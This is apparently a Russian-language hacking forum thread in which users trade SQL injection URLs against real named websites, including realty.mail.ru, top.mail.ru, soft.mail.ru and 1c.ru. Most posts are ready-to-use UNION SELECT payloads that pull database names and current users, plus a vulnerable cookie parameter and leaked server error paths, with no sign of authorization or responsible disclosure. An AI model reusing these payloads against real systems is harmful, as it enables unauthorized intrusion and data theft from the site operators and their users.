http://realty.mail.ru/main/sale/id_1'/results.aspx
;)

или уш вот -) http://realty.mail.ru/main/sale/id_1'www.antichat.ru-FOREVA'/results.aspx

лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20selec t%20DB_NAME(1),CURRENT_USER--

Щас проверим :(
РАБОТАЕТ не так ссылку написал :(
http://www.1c.ru/partwebs/partwebs.jsp?city=antichat.ru'%20union%20select%20 DB_NAME(0),CURRENT_USER--

Вот работает
http://realty.mail.ru/main/sale/id_1'/results.aspx

после id_1 НАДО чтоб он написал ' а он не пишет

вот нашел еще одну sql иньекцию в mail.ru

http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/*

SQL-INJECTION на soft.mail.ru.

Уязвимость в cookies на страницах:
index.php, interview_list.php, search_result_header.php, softclub-main.php.
Уязвимый параметр - OP_ID='.

Ошибка:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/test.allsoft.ru/aux/bokovik/opinion.inc on line 84

А что линк убрал?

вот нашел еще одну sql иньекцию в mail.ru

http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/*
Я помню ещё с киборгом смотрели. Затряли на кодировке.
Failed to get record: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

статью мою почитай

http://top.mail.ru/stat?url=999%27+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15/*

Zaco дай пожалуста ссылку.

http://forum.antichat.ru/thread19684.html

лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20selec t%20DB_NAME(1),CURRENT_USER--

Народ, обьясните пожалуйсто что с этим можно сделать?